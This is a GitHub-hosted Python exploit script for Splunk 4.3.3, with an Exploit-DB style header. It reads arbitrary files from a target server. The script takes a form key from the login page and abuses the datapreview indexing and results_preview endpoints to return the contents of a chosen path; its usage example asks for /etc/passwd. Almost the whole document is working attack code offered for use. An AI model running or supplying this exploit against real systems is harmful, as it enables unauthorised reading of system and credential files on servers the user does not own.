-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathsplunk-4.3.3-arbitrary-file-read.py
54 lines (47 loc) · 1.61 KB
/
splunk-4.3.3-arbitrary-file-read.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
# Exploit Title: Splunk 4.3.3 - Arbitrary File Read
# Date: 04/08/2021
# Exploit Author: krastanoel
# Vulnerability Discovery By: Marcio Almeida
# Vendor Homepage: http://www.splunk.com/
# Software Link: http://www.splunk.com/download?r=header
# Version: 4.3.3
# Tested on: Linux - Debian Buster
#!/usr/bin/env python
import json, re, requests, sys, time
if len(sys.argv) < 3:
usage = """Usage: {} [ipaddr] [port] [filepath]
Example: {} 192.168.56.65 8000 /etc/passwd"""
print(usage.format(sys.argv[0],sys.argv[0]))
exit()
ipaddr = sys.argv[1]
port = sys.argv[2]
filepath = sys.argv[3]
url = "http://{}:{}/en-US".format(ipaddr,port)
# 1st req
url1 = url + "/account/login"
r = requests.get(url1)
content = r.content.decode()
cookies = r.cookies
## get form key
s = re.search('.*"FORM_KEY": "([^"]+)"', content)
form_key = s.group(1)
# 2nd req
url2 = url + "/custom/splunk_datapreview/svc/-/-/indexing/preview"
h = {'X-Requested-With': 'XMLHttpRequest', 'X-Splunk-Form-Key': form_key}
p = {'props.NO_BINARY_CHECK': 1, 'props.sourcetype': '^^idontexistyet^^', 'input.path': filepath}
r = requests.post(url2, cookies = cookies, headers = h, data = p)
## get text value
s = json.loads(r.content)
text = s['d']['__messages'][0]['text']
time.sleep(1)
# 3rd req
url3 = url + "/custom/splunk_datapreview/svc/-/-/search/jobs/{}/results_preview?count=9999999".format(text)
r = requests.get(url3, cookies = cookies)
s = json.loads(r.content)
## get results
try:
results = s['d']['results']['data']
raw = [ sub['_raw'][0]['value'][0] for sub in results ]
print("\n".join(raw))
except KeyError:
print("{} file is not found".format(filepath))